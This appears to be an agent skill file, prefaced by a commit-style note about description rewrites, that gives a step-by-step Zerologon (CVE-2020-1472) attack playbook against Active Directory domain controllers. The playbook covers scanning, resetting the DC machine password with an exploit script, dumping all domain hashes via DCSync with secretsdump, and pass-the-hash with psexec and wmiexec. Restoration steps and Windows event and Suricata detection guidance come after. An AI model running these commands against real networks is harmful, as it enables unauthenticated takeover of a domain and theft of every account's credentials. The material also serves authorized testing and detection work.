Each rewritten description now states both what the skill does (concrete
capability, named tools/artifacts) and an explicit when-to-use trigger,
improving agent discovery/activation. Grounded in each skill's own body;
changes confined to the `description` field only (bodies and all other
frontmatter untouched). Produced by a gated audit->rewrite->recheck loop
(548 -> 0 flagged) with a sampled anti-invention check (0 ungrounded).
Schema: 817/817 pass. Framework-ID gate: 0 defects.
Exploits the Zerologon vulnerability (CVE-2020-1472) in the Netlogon Remote Protocol using Impacket to reset a domain controller's machine account password to empty, then runs DCSync via secretsdump.py to dump domain credentials. Use when red-teaming or validating unpatched Active Directory domain controllers for Zerologon, including restoring the machine account password afterward.
Zerologon (CVE-2020-1472) is a critical elevation of privilege vulnerability (CVSS 10.0) in the Microsoft Netlogon Remote Protocol (MS-NRPC). The flaw exists in the cryptographic implementation of AES-CFB8 mode, where the initialization vector (IV) is incorrectly set to all zeros. This allows an unauthenticated attacker with network access to a domain controller to establish a Netlogon session and reset the DC machine account password to empty, achieving full domain compromise. Microsoft patched this vulnerability in August 2020 (KB4571694).
When to Use
When performing authorized security testing that involves exploiting zerologon vulnerability cve 2020 1472
When analyzing malware samples or attack artifacts in a controlled environment
When conducting red team exercises or penetration testing engagements
When building detection capabilities based on offensive technique understanding
Prerequisites
Network access to a Domain Controller (TCP port 135 and dynamic RPC ports)
No authentication required (unauthenticated exploit)
Target DC must not have the February 2021 enforcement mode enabled
Impacket toolkit installed
Written authorization for red team engagement
Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.
MITRE ATT&CK Mapping
Technique ID
Name
Tactic
T1068
Exploitation for Privilege Escalation
Privilege Escalation
T1210
Exploitation of Remote Services
Lateral Movement
T1003.006
OS Credential Dumping: DCSync
Credential Access
T1078.002
Valid Accounts: Domain Accounts
Persistence
Vulnerability Technical Details
Root Cause
The Netlogon authentication protocol uses AES-CFB8 encryption with a client challenge and server challenge. The vulnerability exists because:
The IV is hardcoded to 16 bytes of zeros
When the plaintext is 8 bytes of zeros, AES-CFB8 produces a ciphertext of all zeros with probability 1 in 256
An attacker can send approximately 256 authentication attempts (takes ~3 seconds) to succeed
Affected Systems
Windows Server 2008 R2 through Windows Server 2019
All domain controllers running unpatched Netlogon service
Samba versions < 4.8 (if running as AD DC)
Step 1: Identify Vulnerable Domain Controllers
# Scan for domain controllers
nmap -p 135,139,389,445 -sV --script=ms-sql-info,smb-os-discovery 10.10.10.0/24
# Check if DC is vulnerable using zerologon checker
python3 zerologon_tester.py DC01 10.10.10.1
# Using CrackMapExec
crackmapexec smb 10.10.10.1 -M zerologon
Step 2: Exploit Zerologon
# Using Impacket's CVE-2020-1472 exploit# This sets the DC machine account password to empty
python3 cve_2020_1472.py DC01$ 10.10.10.1
# Expected output:# Performing authentication attempts...# =========================================# NetrServerAuthenticate2 Result: 0 (success after ~256 attempts)# NetrServerPasswordSet2 call was successful# DC01$ machine account password set to empty string
Step 3: DCSync with Empty Password
# Use the empty hash to perform DCSync
secretsdump.py -no-pass -just-dc corp.local/DC01\$@10.10.10.1
# Output includes all domain hashes:# Administrator:500:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f3bc61e97fb14d18c42bcbf6c3a9055f:::# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:e4cba78b4c01d6e5c0e31ffff18e46ab:::# Alternatively, dump specific accounts
secretsdump.py -no-pass corp.local/DC01\$@10.10.10.1 \
-just-dc-user Administrator
Step 4: Obtain Domain Admin Access
# Pass the Hash with Administrator NTLM
psexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
# Or use wmiexec for stealthier access
wmiexec.py -hashes :32ed87bdb5fdc5e9cba88547376818d4 \
corp.local/Administrator@10.10.10.1
WARNING: After exploiting Zerologon, the DC machine account password is empty, which will break Active Directory replication and services. You MUST restore it.
# Method 1: Use the exploit's restore functionality
python3 restorepassword.py corp.local/DC01@DC01 -target-ip 10.10.10.1 \
-hexpass <original_hex_password>
# Method 2: Force machine account password change from DC# Connect to DC as Administrator and run:
netdom resetpwd /server:DC01 /userd:CORP\Administrator /passwordd:*
# Method 3: Restart the DC (it will auto-regenerate machine password)# This is the safest method but causes downtime
Detection
Windows Event Logs
Event ID 4742: A computer account was changed
- Look for: DC$ account with password change
- Anomaly: Multiple 4742 events for DC$ in short period
Event ID 5805: Netlogon authentication failure
- Multiple failures followed by success = Zerologon attempt
Event ID 4624 (Type 3): Network logon
- DC$ account logging in from unexpected IP
Network Detection
# Suricata rule for Zerologonalert dcerpc any any -> any any (msg:"ET EXPLOIT Possible Zerologon NetrServerReqChallenge";flow:established,to_server;dce_opnum:4;content:"|00 00 00 00 00 00 00 00|";sid:2030870;rev:1;)